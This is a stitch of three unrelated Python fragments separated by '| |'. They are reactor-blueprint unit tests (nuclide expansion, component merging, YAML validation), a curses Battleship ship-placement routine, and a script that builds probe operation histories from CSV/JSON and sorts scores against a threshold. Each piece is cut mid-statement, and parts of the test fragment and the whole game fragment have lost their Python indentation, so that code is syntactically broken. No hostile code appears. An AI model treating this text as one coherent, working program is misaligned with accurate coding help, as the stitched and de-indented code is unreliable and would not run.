            set(assem.getNuclides()).issubset(set(design.allNuclidesInProblem))
        )
    def test_nuclidesMc2v3(self):
        """Tests that ZR is expanded to its isotopics for MC2v3."""
        cs = settings.Settings()
        newSettings = {"xsKernel": "MC2v3"}
        cs = cs.modified(newSettings=newSettings)
        design = blueprints.Blueprints.load(self.yamlString)
        design._prepConstruction(cs)
        # 93 and 95 are not naturally occurring.
        zrNucs = {"ZR" + str(A) for A in range(90, 97)} - {"ZR93", "ZR95"}
        self.assertTrue(
            set({"U238", "U235"} | zrNucs).issubset(set(design.allNuclidesInProblem))
        )
        # The expanded ZR isotopes are inert (not burned) in this problem.
        self.assertTrue(zrNucs.issubset(set(design.inertNuclides)))
        assem = design.constructAssem(cs, name="fuel a")
        # the assembly won't get non-naturally occurring nuclides
        unnaturalZr = (
            n.name for n in bySymbol["ZR"].nuclideBases if n.abundance == 0.0
        )
        designNucs = set(design.allNuclidesInProblem).difference(unnaturalZr)
        self.assertTrue(set(assem.getNuclides()).issubset(designNucs))
    def test_merge(self):
        """Components merged via ``mergeWith`` must conserve area and mass.

        The fixture defines the same geometry twice: "merge block" dissolves
        components A and B into Clad, "nomerge block" leaves them separate.
        NOTE(review): YAML indentation reconstructed — verify against VCS.
        """
        yamlString = r"""
nuclide flags:
    B10: {burn: true, xs: true}
    B11: {burn: true, xs: true}
    DUMP1: {burn: true, xs: true}
    FE: {burn: true, xs: true}
    NI: {burn: true, xs: true}
    C: {burn: true, xs: true}
    MO: {burn: true, xs: true}
    SI: {burn: true, xs: true}
    CR: {burn: true, xs: true}
    MN: {burn: true, xs: true}
    NA: {burn: true, xs: true}
    V: {burn: true, xs: true}
    W: {burn: true, xs: true}
blocks:
    nomerge block: &unmerged_block
        A: &comp_a
            shape: Circle
            material: B4C
            Tinput: 50.0
            Thot: 500.0
            id: 0.0
            mult: 1
            od: .5
        Gap1: &comp_gap
            shape: Circle
            material: Void
            Tinput: 50.0
            Thot: 500.0
            id: A.od
            mult: 1
            od: B.id
        B: &gcomp_b
            shape: Circle
            material: HT9
            Tinput: 20.0
            Thot: 600.0
            id: .5
            mult: 1
            od: .75
        Gap2: &comp_gap2
            shape: Circle
            material: Void
            Tinput: 50.0
            Thot: 500.0
            id: B.od
            mult: 1
            od: Clad.id
        Clad: &comp_clad
            shape: Circle
            material: HT9
            Tinput: 20.0
            Thot: 700.0
            id: .75
            mult: 1
            od: 1.0
        coolant: &comp_coolant
            shape: DerivedShape
            material: Sodium
            Tinput: 600.0
            Thot: 600.0
        duct: &comp_duct
            shape: Hexagon
            material: HT9
            Tinput: 20.0
            Thot: 500.0
            ip: 1.2
            mult: 1
            op: 1.4
        intercoolant: &comp_intercoolant
            shape: Hexagon
            material: Sodium
            Tinput: 500.0
            Thot: 500.0
            ip: duct.op
            mult: 1
            op: 1.6
    merge block: &merged_block
        A:
            <<: *comp_a
            mergeWith: Clad
        Gap1: *comp_gap
        B:
            <<: *gcomp_b
            mergeWith: Clad
        Gap2: *comp_gap2
        Clad: *comp_clad
        coolant: *comp_coolant
        duct: *comp_duct
        intercoolant: *comp_intercoolant
assemblies:
    a: &assembly_a
        specifier: IC
        blocks: [*merged_block, *unmerged_block]
        height: [1.0, 1.0]
        axial mesh points: [1, 1]
        xs types: [A, A]
"""
        bp = blueprints.Blueprints.load(yamlString)
        a = bp.constructAssem(settings.Settings(), name="a")
        mergedBlock, unmergedBlock = a
        # A and B were dissolved into Clad in the merged block.
        self.assertNotIn("A", mergedBlock.getComponentNames())
        self.assertNotIn("B", mergedBlock.getComponentNames())
        # The merged block carries four fewer components (presumably A, B and
        # the two gaps — confirm against the merge implementation).
        self.assertEqual(len(mergedBlock) + 4, len(unmergedBlock))
        # Total cross-sectional area is conserved by the merge.
        self.assertAlmostEqual(
            sum(c.getArea() for c in mergedBlock),
            sum(c.getArea() for c in unmergedBlock),
        )
        mergedNucs, unmergedNucs = (
            mergedBlock.getNumberDensities(),
            unmergedBlock.getNumberDensities(),
        )
        # Accumulate all number-density mismatches so that a single failure
        # message reports every differing nuclide at once.
        errorMessage = ""
        for nucName in set(unmergedNucs) | set(mergedNucs):
            n1, n2 = unmergedNucs[nucName], mergedNucs[nucName]
            try:
                self.assertAlmostEqual(n1, n2)
            except AssertionError:
                errorMessage += "\nnuc {} not equal. unmerged: {} merged: {}".format(
                    nucName, n1, n2
                )
        self.assertTrue(not errorMessage, errorMessage)
        self.assertAlmostEqual(mergedBlock.getMass(), unmergedBlock.getMass())
def test_nuclideFlags(self):
with self.assertRaises(yamlize.YamlizingError):
NuclideFlags.load("{potato: {burn: true, xs: true}}")
with self.assertRaises(yamlize.YamlizingError):
NuclideFlags.load("{U238: {burn: 12, xs: 0}}")
def test_customIsotopics(self):
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load("MOX: {input format: applesauce}")
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load("MOX: {input format: number densities, density: -0.1}")
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load(
"MOX: {input format: number densities, density: 1.5, FAKENUC234: 0.000286}"
)
    def test_components(self):
        """Each malformed component definition must raise a YamlizingError."""
        bads = [
            # unknown shape
            {
                "shape": "potato",
                "name": "name",
                "material": "HT9",
                "Tinput": 1.0,
                "Thot": 1.0,
            },
            # missing material
            {"shape": "Circle", "name": "name", "Tinput": 1.0, "Thot": 1.0},
            # missing Tinput
            {"shape": "circle", "name": "name", "material": "HT9", "Thot": 1.0},
            # missing Thot
            {"shape": "circle", "name": "name", "material": "HT9", "Tinput": 1.0},
            # mergeWith must be a string, not an int
            {
                "shape": "circle",
                "name": "name",
                "material": "HT9",
                "Tinput": 1.0,
                "Thot": 1.0,
                "mergeWith": 6,
            },
            # isotopics must be a string, not an int
            {
                "shape": "circle",
                "name": "name",
                "material": "HT9",
                "Tinput": 1.0,
                "Thot": 1.0,
                "isotopics": 4,
            },
            # dimension keys must be strings
            {
                "shape": "circle",
                "name": "name",
                "material": "HT9",
                "Tinput": 1.0,
                "Thot": 1.0,
                5: "od",
            },
            # malformed mult expression
            {
                "shape": "circle",
                "name": "name",
                "material": "HT9",
                "Tinput": 1.0,
                "Thot": 1.0,
                "mult": "potato,mult",
            },
        ]
        # repr(dict) happens to be valid YAML flow mapping syntax here.
        for bad in bads:
            with self.assertRaises(yamlize.YamlizingError):
                ComponentBlueprint.load(repr(bad))
def test_cladding_invalid(self):
"""Make sure cladding input components are flagged as invalid."""
bad = {
"name": "cladding",
"shape": "Circle",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
}
with self.assertRaises(yamlize.YamlizingError):
ComponentBlueprint.load(repr(bad))
def test_withoutBlocks(self):
# Some projects use a script to generate an input that has completely unique blocks,
# so the blocks: section is not needed
yamlWithoutBlocks = """
nuclide flags:
U238: {burn: true, xs: true}
U235: {burn: true, xs: true}
LFP35: {burn: true, xs: true}
U236: {burn: true, xs: true}
PU239: {burn: true, xs: true}
DUMP2: {burn: true, xs: true}
DUMP1: {burn: true, xs: true}
NP237: {burn: true, xs: true}
PU238: {burn: true, xs: true}
PU236: {burn: true, xs: true}
LFP39: {burn: true, xs: true}
PU238: {burn: true, xs: true}
LFP40: {burn: true, xs: true}
PU241: {burn: true, xs: true}
LFP38: {burn: true, xs: true}
U234: {burn: true, xs: true}
AM241: {burn: true, xs: true}
LFP41: {burn: true, xs: true}
PU242: {burn: true, xs: true}
AM243: {burn: true, xs: true}
CM244: | |
that was allowed.')
screen.refresh()
wait()
elif xc >= 8 and yc >= 8:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc >= 8 and yc <= 1:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'down' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
else:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'left' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
wait()
if zc == 'up':
yc2 = yc - 1
yc3 = yc - 2
if player_board[yc][xc] == 'O' and player_board[yc2][xc] == 'O' and player_board[yc3][xc] == 'O':
player_board[yc][xc] = '3'
player_board[yc2][xc] = '3'
player_board[yc3][xc] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
elif zc == 'down':
yc2 = yc + 1
yc3 = yc + 2
if player_board[yc][xc] == 'O' and player_board[yc2][xc] == 'O' and player_board[yc3][xc] == 'O':
player_board[yc][xc] = '3'
player_board[yc2][xc] = '3'
player_board[yc3][xc] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
elif zc == 'right':
xc2 = xc + 1
xc3 = xc + 2
if player_board[yc][xc] == 'O' and player_board[yc][xc2] == 'O' and player_board[yc][xc3] == 'O':
player_board[yc][xc] = '3'
player_board[yc][xc2] = '3'
player_board[yc][xc3] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
else:
xc2 = xc - 1
xc3 = xc - 2
if player_board[yc][xc] == 'O' and player_board[yc][xc2] == 'O' and player_board[yc][xc3] == 'O':
player_board[yc][xc] = '3'
player_board[yc][xc2] = '3'
player_board[yc][xc3] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
screen.clear()
wait()
def make_player_ship4():
screen.clear()
screen.refresh()
screen.addstr(0, 0, 'Now we will generate your fourth ship. Please answer the following questions correctly, because if your answer doesn\'t meet our set requirements, the question will be asked again.\n')
screen.refresh()
wait()
while True:
while True:
try:
screen.clear()
prompt_str = 'Where do you want the first x coordinate of this ship to be? Enter a number between 0 to 9: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
x = int(screen.getstr(0, l))
while x >= 10 or x <= -1:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
x = int(screen.getstr(0, l))
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
wait()
while True:
try:
prompt_str = 'Where do you want the first y coordinate of this ship to be? Enter a number between 0 to 9: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
y = int(screen.getstr(0, l))
while y >= 10 or y <= -1:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
y = int(screen.getstr(0, l))
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
wait()
xc = x
yc = 9 - y
if xc <= 2 and yc != 1 and yc != 8 and yc != 0 and yc != 9 and yc != 2 and yc != 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc >= 7 and yc != 1 and yc != 8 and yc != 0 and yc != 9 and yc != 2 and yc != 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif yc <= 2 and xc != 2 and xc != 7 and xc != 1 and xc != 8 and xc != 0 and xc != 9:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'left' and zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif yc >= 7 and xc != 2 and xc != 7 and xc != 1 and xc != 8 and xc != 0 and xc != 9:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'left' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc <= 2 and yc <= 2:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc <= 2 and yc >= 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up or right: '
l = len(prompt_str)
screen.addstr(0, | |
<gh_stars>0
import csv
import json
import numpy as np
from parse import *
import sys
import argparse
from argparse import RawTextHelpFormatter
# import matplotlib.pyplot as plt
# import pandas as pd
# import numpy as np
def CSVreader(path):
    """Read a pipe-delimited CSV file and return its rows.

    Parameters
    ----------
    path : str
        Path of the file to read.

    Returns
    -------
    list of list of str
        One list of string fields per input row.
    """
    # QUOTE_NONE: quote characters are treated as ordinary data.
    with open(path) as f:
        reader = csv.reader(f, delimiter='|', quoting=csv.QUOTE_NONE)
        # The reader is iterable; materialize it directly instead of
        # appending row by row.
        return list(reader)
def printInColumn(A):
    """Print each element of *A* on its own line, or ``None`` for empty input.

    The sentinels ``None``, ``''``, ``[]`` and the literal string ``'[]'``
    are all treated as "nothing to print" (kept for backward compatibility).
    """
    if (A is None) or (A == '[]') or (A == []) or (A == ''):
        print('None')
    else:
        # Iterate directly instead of indexing with range(len(...)).
        for row in A:
            print(row)
def sortScoreMatrix(matrix):
    """Sort *matrix* rows in place by descending score and return it.

    Each row carries its sort key at index 1 (e.g. ``[name, score]``).
    Replaces the original O(n^2) swap sort with the built-in Timsort;
    for rows with equal keys the (previously unspecified) tie order is
    now stable.
    """
    matrix.sort(key=lambda row: row[1], reverse=True)
    return matrix
def check(A):
    """Return True if *A* contains any duplicate element.

    ``None`` (and empty input) yields False. The original implementation
    shadowed the function name with a local flag and always scanned every
    pair; this version returns as soon as a duplicate is found.
    """
    if A is None:
        return False
    # Membership test on the tail keeps semantics for unhashable elements
    # (a set-based test would require hashable items).
    for i, item in enumerate(A):
        if item in A[i + 1:]:
            return True
    return False
def createJsonProbeHistory(probePath, journalPath, operationsPath):
    """Build ``./probeHistory.json`` from the probe CSV, journal CSV and operations JSON.

    Rows of the probe CSV are grouped by probe ID, cross-referenced against
    the journal to resolve each operation, enriched with the operation
    description from the operations JSON, and dumped as one JSON document
    with one entry per probe.
    """
    A = CSVreader(probePath)
    A.remove(A[0])  # drop the header row
    # Group consecutive rows sharing the same probe ID (column 0) into bigArray.
    pastValue = A[0]
    Operations = []  # NOTE(review): unused
    k = 0  # NOTE(review): unused (rebound by the loops below)
    B = []
    bigArray = []
    for i in range(len(A)):
        currentValue = A[i]
        if currentValue[0] == pastValue[0]:
            B.append(currentValue)
        else:
            bigArray.append(B)
            B = []
            B.append(currentValue)  # keep the first row of the new group
        pastValue = currentValue
        if i == len(A) - 1:
            bigArray.append(B)
    # Sort each group by Sequence (column 4), descending.
    # NOTE(review): compared as strings, not numbers — confirm intended.
    tmpRows = []
    for i in range(len(bigArray)):
        for j in range(len(bigArray[i])):
            for k in range(j, len(bigArray[i])):
                if bigArray[i][j][4] < bigArray[i][k][4]:
                    tmpRows = bigArray[i][j]
                    bigArray[i][j] = bigArray[i][k]
                    bigArray[i][k] = tmpRows
                    tmpRows = []
    # Cross-reference the journal CSV to resolve each row's operation;
    # C collects flat rows, C2 groups them per probe.
    B = CSVreader(journalPath)
    C = []
    C2 = []
    tmpOP = []
    for i in range(len(bigArray)):
        for j in range(len(bigArray[i])):
            for k in range(len(B)):
                if (bigArray[i][j][1] == B[k][0]) and (bigArray[i][j][2] == B[k][1]) and (
                        (bigArray[i][j][3] == B[k][2])):
                    # print(B[k][0],B[k][3],B[k][5],B[k][6])
                    # Last field is a placeholder for the description added below.
                    tmp = [bigArray[i][j][0], B[k][3], B[k][5], B[k][6], ""]
                    tmpOP.append([bigArray[i][j][0], B[k][3], B[k][5], B[k][6], ""])
                    C.append(tmp)
        C2.append(tmpOP)
        tmpOP = []
    # Open the operations JSON and fill in each operation's description in C2.
    with open(operationsPath) as f:
        data = json.load(f)
    # pprint(data)  # dumps everything
    # print(data.keys())  # all top-level keys
    # print(data['operations'][0].keys())  # keys of operations[0]
    # print(data['operations'][0]['name'])  # value of the 'name' key of operations[0]
    # print(len(data['operations']))  # number of operations present
    for i in range(len(C2)):
        for k in range(len(C2[i])):
            for j in range(len(data['operations'])):
                if C2[i][k][1] == data['operations'][j]['name']:
                    C2[i][k][4] = data['operations'][j]['description']
                    # print(i, B[k][3], B[k][5], B[k][6], B[k][7])
    # Build the JSON document: one entry per probe, each with its operations.
    totalProbes = []
    probes = {}
    tmpOperations = {}
    for i in range(len(C2)):
        probeOperations = []
        for j in range(len(C2[i])):
            tmpOperations = {
                "name": C2[i][j][1],
                "purpose": C2[i][j][2],
                "operationArgument": C2[i][j][3],
                "description": C2[i][j][4]
            }
            probeOperations.append(tmpOperations)
        probes = {
            "probeID": C2[i][0][0],
            "operations": probeOperations
        }
        totalProbes.append(probes)
    probesFile = {
        "probesFileID": totalProbes
    }
    # Write next to the working directory; overwrites any previous run.
    with open('./probeHistory.json', 'w') as fp:
        json.dump(probesFile, fp, indent=4, ensure_ascii=False)
    print('JSON file has been created')
def addCameraReference(matrix, camera):
    """Attach the manipulation flag and image extension from *camera* to each row.

    A matrix row ``[probe, cam, score]`` matches a camera record when the
    probe ID equals column 1 and the camera name equals column 3. Matching
    rows become ``[probe, cam, score, flag, extension]``; rows flagged 'Y'
    (manipulated) are placed before all others in the returned list.
    """
    flagged = []
    unflagged = []
    for row in matrix:
        for cam in camera:
            if row[0] == cam[1] and row[1] == cam[3]:
                # cam[2] is a file name; keep everything after the first dot.
                entry = [row[0], row[1], row[2], cam[5], cam[2].split(".", 1)[1]]
                target = flagged if cam[5] == 'Y' else unflagged
                target.append(entry)
    return flagged + unflagged
def division(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout,returnFlag = 0):
    """Partition score rows into opt-out / matched / unmatched / unknown-probe sets.

    Rows whose score equals *valore_optout* go to ``scoreMatrix_opt``; the
    remaining known probes are split at the *valore_soglia* threshold into
    MATCHED / NOMATCHED; probes absent from the history JSON land in
    ``noJSON``. With ``returnFlag == 0`` the sets are printed; with
    ``returnFlag == 1`` they are returned as a 4-tuple.
    """
    # finalScore.csv
    scoreMatrix = CSVreader(finalScorePath)
    scoreMatrix.remove(scoreMatrix[0])  # drop the header row
    # probeHistory.json
    # Read the camera / manipulation reference CSV
    camera = CSVreader(cameraPath)
    camera.remove(camera[0])  # drop the header row
    # Load the probe operation histories
    with open(opHistoryPath) as f:
        opHistory = json.load(f)
    # Rows [probe, camera, score] whose score equals the opt-out sentinel
    scoreMatrix_opt = []
    # Rows whose score differs from the opt-out sentinel
    scoreMatrix_no_opt = []
    # Rows whose probe ID does not appear in the history JSON
    noJSON = []
    tmp = []
    count = 0
    match = False
    # NOTE(review): if a probe ID occurs more than once in the JSON, its row
    # is appended once per occurrence — confirm IDs are unique.
    for i in range(len(scoreMatrix)):
        for j in range(len(opHistory['probesFileID'])):
            if scoreMatrix[i][0] == opHistory['probesFileID'][j]['probeID']:
                match = True
                if scoreMatrix[i][3] == str(valore_optout):
                    tmp.append(scoreMatrix[i][0])  # Probe
                    tmp.append(scoreMatrix[i][1])  # Camera
                    tmp.append(scoreMatrix[i][3])  # Score
                    scoreMatrix_opt.append(tmp)  # Probe|Camera|Score
                    tmp = []
                else:
                    tmp.append(scoreMatrix[i][0])  # Probe
                    tmp.append(scoreMatrix[i][1])  # Camera
                    tmp.append(scoreMatrix[i][3])  # Score
                    scoreMatrix_no_opt.append(tmp)  # Probe|Camera|Score
                    tmp = []
        if match == False:
            count = count + 1
            tmp.append(scoreMatrix[i][0])  # Probe
            tmp.append(scoreMatrix[i][1])  # Camera
            tmp.append(scoreMatrix[i][3])  # Score
            noJSON.append(tmp)  # Probe|Camera|Score
            tmp = []
        match = False
    # Attach manipulation flag + image extension from the camera reference.
    scoreMatrix_opt = addCameraReference(scoreMatrix_opt,camera)
    scoreMatrix_no_opt = addCameraReference(scoreMatrix_no_opt,camera)
    noJSON = addCameraReference(noJSON,camera)
    # Analysis of scoreMatrix_no_opt: split at the score threshold.
    MATCHED = []
    NOMATCHED = []
    for i in range(len(scoreMatrix_no_opt)):
        if (float(scoreMatrix_no_opt[i][2]) >= valore_soglia):
            MATCHED.append(scoreMatrix_no_opt[i])
        else:
            NOMATCHED.append(scoreMatrix_no_opt[i])
    # noJSON holds rows [probeID, camera, score, flag, ext] grouped with the
    # manipulated ('Y') rows first.
    if returnFlag == 0:
        print('')
        print('probe with score = ',valore_optout)
        printInColumn(scoreMatrix_opt)
        print('')
        print('probe with score >= ', valore_soglia)
        printInColumn(MATCHED)
        print('')
        print('probe with score < ', valore_soglia)
        printInColumn(NOMATCHED)
        print('')
        print('------------- probe not found in json history -------------------- ')
        printInColumn(noJSON)
    if returnFlag == 1:
        return scoreMatrix_opt,MATCHED,NOMATCHED,noJSON
def AddHistoryManip(scoreMatrix, opHistory):
    """Join each 5-field score row with its operation history.

    Rows are ``[probe, camera, score, flag, extension]``; the matching
    probe's operation list is appended as a sixth field. Rows without a
    matching ``probeID`` in *opHistory* are dropped.
    """
    joined = []
    for row in scoreMatrix:
        for probe in opHistory['probesFileID']:
            if row[0] == probe['probeID']:
                joined.append(
                    [row[0], row[1], row[2], row[3], row[4], probe['operations']]
                )
    return joined
def AddHistory(scoreMatrix, opHistory):
    """Join score rows with their operation histories.

    Each matching row yields ``[probe, camera, score, operations]`` (note:
    input column 2 is intentionally skipped, column 3 holds the score).

    Returns
    -------
    tuple(list, int)
        The joined rows and the length of the longest operation list seen.
    """
    joined = []
    longest = 0
    for row in scoreMatrix:
        for probe in opHistory['probesFileID']:
            if row[0] == probe['probeID']:
                ops = probe['operations']
                joined.append([row[0], row[1], row[3], ops])
                if len(ops) > longest:
                    longest = len(ops)
    return joined, longest
def countOp(matrix):
    """Count, for each distinct operation name, how many rows of *matrix* use it.

    Each row carries its operation-history list at index 5. An operation is
    counted at most once per row, however often the row repeats it.

    Returns
    -------
    list of [name, count]
        In order of first appearance (matching the original O(n^4)
        implementation, but computed in a single pass; relies on the
        Python 3.7+ dict insertion-order guarantee).
    """
    counts = {}
    for row in matrix:
        # Deduplicate names within the row so each row contributes at most 1,
        # preserving first-appearance order.
        row_names = []
        for operation in row[5]:
            name = operation['name']
            if name not in row_names:
                row_names.append(name)
        for name in row_names:
            counts[name] = counts.get(name, 0) + 1
    return [[name, total] for name, total in counts.items()]
def manipulation_analysis(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout):
    """Print operation-occurrence statistics for each score bucket.

    Buckets come from :func:`division`: opt-out score, score >= threshold
    (MATCHED), score < threshold (NOMATCHED), and probes missing from the
    history JSON. Output messages are intentionally left in Italian.
    """
    scoreMatrix_opt,MATCHED,NOMATCHED,noJSON = division(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout,returnFlag = 1)
    # Load the probe operation histories
    with open(opHistoryPath) as f:
        opHistory = json.load(f)
    # Join each bucket with its operation histories.
    scoreOperations_one = AddHistoryManip(scoreMatrix_opt,opHistory)
    scoreOperations_no_one_matched = AddHistoryManip(MATCHED,opHistory)
    scoreOperations_no_one_no_matched = AddHistoryManip(NOMATCHED,opHistory)
    # Count operation occurrences within each bucket.
    '''Conteggio ricorrenza operazioni in scoreMatrix_one, scoreMatrix_no_one_matched, scoreMatrix_no_one_no_matched'''
    repeatOp_matched = countOp(scoreOperations_no_one_matched)
    repeatOp_noMatched = countOp(scoreOperations_no_one_no_matched)
    repeatOp_one = countOp(scoreOperations_one)
    # Global summary: probe counts per category.
    print('\nNumero di ProbeID nel CSV score: ', len(scoreMatrix_opt)+ len(MATCHED)+ len(NOMATCHED) + len(noJSON))
    print('Numero di ProbeID nel JSON contente le storie: ', len(opHistory['probesFileID']))
    print("")
    print('Numero di ProbeID che matchano nel JSON contenente le storie, e quindi analizzabili: ', len(scoreMatrix_opt) + len(MATCHED)+ len(NOMATCHED))
    print('Numero di ProbeID non trovate nel JSON contenente storie: ', len(noJSON))
    print("")
    print('--------------- Probe trovate nel Json contente le storie --------------------')
    print('                  Occorrenze delle operazioni')
    # Sort each occurrence table by descending count before printing.
    repeatOp_oneSorted = sortScoreMatrix(repeatOp_one)
    repeatOp_no_MatchedSorted = sortScoreMatrix(repeatOp_noMatched)
    repeatOp_matchedSorted = sortScoreMatrix(repeatOp_matched)
    print('score =',valore_optout, ' n° probe =',len(scoreMatrix_opt))
    printInColumn(repeatOp_oneSorted)
    print("")
    print('score <', valore_soglia, ' n° probe =',len(NOMATCHED))
    printInColumn(repeatOp_no_MatchedSorted)
    print("")
    print('score >=', valore_soglia, ' n° probe =',len(MATCHED))
    printInColumn(repeatOp_matchedSorted)
    print("")
    print('--------------- Probe NON trovate nel Json contente le storie-------------------- n° probe = ',len(noJSON))
    printInColumn(noJSON)
def _scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2):
    """Scan row *i* of *tmpMatrix* for the filtered operations.

    For each name in *opFilter* found in the row's operation history, record
    the matched name and its 1-based position, bump the corresponding cell
    of that filter's occurrence matrix (row = position - 1, column = history
    length - 1), and — if at least one filter matched — append the annotated
    row to *tmpMatrix2*. Mutates *occurenceMatrix* and *tmpMatrix2* in place.
    """
    tmp = []
    countOperations = 0
    objPosition = -1  # -1 means "current filter not found in this row"
    atLeastOneOp = False
    p = 0  # probeID index
    c = 1  # camera index
    s = 2  # score index
    op = 3  # operations index
    tmp.append(tmpMatrix[i][p])
    tmp.append(tmpMatrix[i][c])
    for z in range(len(opFilter)):
        currentOperation = opFilter[z]
        currentMatrix = occurenceMatrix[z]
        # Find the first (1-based) position of the filtered name, if any;
        # names are compared case-insensitively (filter is pre-lowercased).
        for j in range(len(tmpMatrix[i][op])):
            countOperations = countOperations + 1
            if (currentOperation == tmpMatrix[i][op][j]['name'].lower()):
                objPosition = countOperations
                break
        if objPosition != -1:
            # j still points at the matched operation thanks to the break.
            tmp.append(tmpMatrix[i][op][j]['name'])
            tmp.append(objPosition)
            atLeastOneOp = True
            currentMatrix[objPosition -1][len(tmpMatrix[i][op]) - 1] = currentMatrix[objPosition -1][len(tmpMatrix[i][op]) -1] + 1
            occurenceMatrix[z] = currentMatrix
        # Reset the per-filter scan state.
        objPosition = -1
        countOperations = 0
    # 'lenght' typo kept: it is a runtime string other tooling may parse.
    tmp.append('lenght:' + " " +str(len(tmpMatrix[i][op])))
    tmp.append('score:' + " "+ str((tmpMatrix[i][s])))
    if atLeastOneOp == True:
        tmpMatrix2.append(tmp)
    tmp = []
    atLeastOneOp = False
def scoreFilter1(finalScorePath, opHistoryPath, score, opFilter, operator='null', score2 = None):
s = 2
